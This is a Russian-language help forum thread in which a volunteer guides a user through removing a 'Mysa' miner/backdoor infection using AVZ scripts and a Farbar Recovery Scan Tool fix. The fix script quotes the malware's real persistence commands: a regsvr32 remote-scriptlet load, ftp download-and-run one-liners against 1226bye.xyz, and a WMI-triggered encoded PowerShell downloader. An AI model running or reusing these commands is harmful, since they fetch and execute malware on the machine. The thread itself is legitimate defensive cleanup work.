Матвей Ульченко 0 Опубликовано 16 апреля, 2019 Share Опубликовано 16 апреля, 2019 (изменено) Здравствуйте, сегодня 16 апреля 2019 года обнаружил данный процесс musa 1 2 3 на своем ПК. У вас на сайте прочёл что это вирус , помогите избавиться . CollectionLog-2019.04.16-19.32.zip Изменено 16 апреля, 2019 пользователем Матвей Ульченко Ссылка на сообщение Поделиться на другие сайты
Mark D. Pearlstone 1 704 Опубликовано 16 апреля, 2019 Share Опубликовано 16 апреля, 2019 Порядок оформления запроса о помощи Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 16 апреля, 2019 Share Опубликовано 16 апреля, 2019 Выполните скрипт в AVZ из папки Autologger begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('C:\Windows\System32\wbiosrvp.dll',''); QuarantineFile('C:\Windows\System32\themctrl.dll',''); QuarantineFile('C:\Windows\debug\item.dat',''); DeleteFile('C:\Windows\debug\item.dat','32'); DeleteFile('C:\Windows\System32\themctrl.dll','64'); DeleteFile('C:\Windows\System32\wbiosrvp.dll','64'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\wbiosrvp\Parameters','ServiceDll','x64'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\themctrl\Parameters','ServiceDll','x64'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32'); DeleteSchedulerTask('Mysa'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('Mysa3'); DeleteSchedulerTask('ok'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(false); end. Обратите внимание: будет выполнена перезагрузка компьютера.Выполните скрипт в AVZ begin CreateQurantineArchive('c:\quarantine.zip'); end. c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678Полученный после загрузки ответ сообщите здесь. Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи. + Сделайте лог TDSSkiller 2 Ссылка на сообщение Поделиться на другие сайты
Матвей Ульченко 0 Опубликовано 16 апреля, 2019 Автор Share Опубликовано 16 апреля, 2019 Результат загрузки Файл сохранён как 190416_175013_quarantine_5cb615d522577.zip Размер файла 3216268 MD5 6f8284bbd4bd43016a01e2955b46e4e9 CollectionLog-2019.04.16-20.59.zip TDSSKiller.3.1.0.28_16.04.2019_20.50.46_log.zip Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 16 апреля, 2019 Share Опубликовано 16 апреля, 2019 Выполните скрипт в AVZ из папки Autologger begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; TerminateProcessByName('c:\windows\temp\conhost.exe'); QuarantineFile('c:\windows\temp\conhost.exe',''); TerminateProcessByName('C:\Windows\inf\lsmm.exe'); QuarantineFile('C:\Windows\inf\lsmm.exe',''); DeleteFile('C:\Windows\inf\lsmm.exe','32'); DeleteFile('c:\windows\temp\conhost.exe','32'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32'); DeleteSchedulerTask('Mysa'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('Mysa3'); DeleteSchedulerTask('ok'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(false); end. Обратите внимание: будет выполнена перезагрузка компьютера.Выполните скрипт в AVZ begin CreateQurantineArchive('c:\quarantine.zip'); end. c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678Полученный после загрузки ответ сообщите здесь. Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи. 2 Ссылка на сообщение Поделиться на другие сайты
Матвей Ульченко 0 Опубликовано 16 апреля, 2019 Автор Share Опубликовано 16 апреля, 2019 Результат загрузки Файл сохранён как 190416_181427_quarantine_5cb61b8331136.zip Размер файла 759337 MD5 283b7687575fabd6eb8921f107885b6a CollectionLog-2019.04.16-21.17.zip Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 16 апреля, 2019 Share Опубликовано 16 апреля, 2019 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files. 3. Нажмите кнопку Scan. 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению. Ссылка на сообщение Поделиться на другие сайты
Матвей Ульченко 0 Опубликовано 16 апреля, 2019 Автор Share Опубликовано 16 апреля, 2019 Сделал Архив ZIP - WinRAR.zip Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 17 апреля, 2019 Share Опубликовано 17 апреля, 2019 1. Выделите следующий код: Start:: CreateRestorePoint: 2019-02-19 12:39 - 2019-04-16 23:45 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat 2019-03-04 18:34 - 2019-04-16 23:44 - 000000080 _____ C:\Windows\system32\s 2019-03-04 18:34 - 2019-04-16 23:44 - 000000078 _____ C:\Windows\system32\ps 2019-03-04 18:34 - 2019-04-16 23:44 - 000000076 _____ C:\Windows\system32\p 2019-03-04 18:29 - 2019-04-16 23:45 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\down.exe 2019-04-16 21:12 - 2019-04-16 23:46 - 000003518 _____ C:\Windows\System32\Tasks\Mysa 2019-04-16 21:12 - 2019-04-16 23:46 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3 2019-04-16 21:12 - 2019-04-16 23:46 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2 2019-04-16 21:12 - 2019-04-16 23:46 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1 2019-04-16 21:12 - 2019-04-16 23:46 - 000003186 _____ C:\Windows\System32\Tasks\ok HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION Task: {0C030FAE-3EC7-4DFD-97E4-5D01A9811954} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {77C89B29-5548-462B-86C0-052678BBF1F7} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION Task: {83761A7F-A43C-4A8E-810B-0A1926E4AE1F} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {BA0044BE-A915-4971-A0FD-BA9780C7E747} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION Task: {BFF224DA-CD77-47C4-B7CE-C2E419D825FC} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {E8549826-1A31-4FFC-8F35-9AE02D93FD6C} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa Task: {EA71F1DC-3103-49E2-B251-6021B28BC8A1} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 665 more characters).] <==== ATTENTION Reboot: End:: 2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).3. Запустите Farbar Recovery Scan Tool. 4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера. Ссылка на сообщение Поделиться на другие сайты
Матвей Ульченко 0 Опубликовано 17 апреля, 2019 Автор Share Опубликовано 17 апреля, 2019 Сделал Fixlog.zip Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 17 апреля, 2019 Share Опубликовано 17 апреля, 2019 Проблема решена? Ссылка на сообщение Поделиться на другие сайты
Матвей Ульченко 0 Опубликовано 17 апреля, 2019 Автор Share Опубликовано 17 апреля, 2019 Как видимо нет , открыл планировщик заданий там ещё находятся процессы mysa,1,2,3 и ok скрин.zip Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 17 апреля, 2019 Share Опубликовано 17 апреля, 2019 Тогда еще раз сделайте лог TDSSkiller Ссылка на сообщение Поделиться на другие сайты
Матвей Ульченко 0 Опубликовано 17 апреля, 2019 Автор Share Опубликовано 17 апреля, 2019 Сделал TDSSKiller.3.1.0.28_17.04.2019_20.55.10_log.zip Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 17 апреля, 2019 Share Опубликовано 17 апреля, 2019 А удалить буткит утилита разве не предлагает? Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения